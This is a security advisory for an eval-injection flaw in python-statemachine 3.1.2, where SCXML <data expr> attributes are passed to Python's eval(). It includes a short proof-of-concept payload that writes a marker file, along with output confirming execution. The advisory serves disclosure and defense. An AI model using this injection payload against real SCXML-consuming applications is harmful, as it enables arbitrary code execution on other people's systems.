GHSA-v4jc-pm6r-3vj8CriticalCVSS 9.8

python-statemachine SCXML <data expr> Eval Injection

Published
June 18, 2026
Last Modified
June 18, 2026

🔗 CVE IDs covered (1)

📋 Description

Summary

python-statemachine 3.1.2 evaluates <data expr="..."> attributes in SCXML documents using Python's eval(). Any application that passes attacker-controlled SCXML content to SCXMLProcessor is vulnerable to arbitrary code execution in the context of the hosting process.

Details

SCXMLProcessor.parse_scxml_file() processes SCXML documents and evaluates <data> element expr attributes via the following call chain:

SCXMLProcessor.parse_scxml_file()
SCXMLProcessor.process_definition()
create_datamodel_action_callable()
_create_dataitem_callable()
_eval()
eval()

_eval() calls Python's built-in eval() directly on the expression string without sandboxing or restriction.

PoC

1. Install:
   pip install python-statemachine==3.1.2

2. Create an SCXML file containing:
   <data id="x" expr="__import__('pathlib').Path('marker.txt').write_text('pwned')"/>

3. Run:
   SCXMLProcessor.parse_scxml_file(DATA_EXPR_CHART)
   SCXMLProcessor.start()

4. During start(), <data expr> reaches _eval(), which calls eval().

5. Result:
   data_marker_before_start: False
   data_marker_after_start: True
   success: True

Impact

This is an eval injection vulnerability (CWE-95). Remote or local code execution depending on whether the consuming application accepts SCXML content from remote users, uploaded files, configuration, plugins, or other untrusted sources.

🎯 Affected products1

  • pip/python-statemachine:>= 3.0.0, < 3.2.0

🔗 References (5)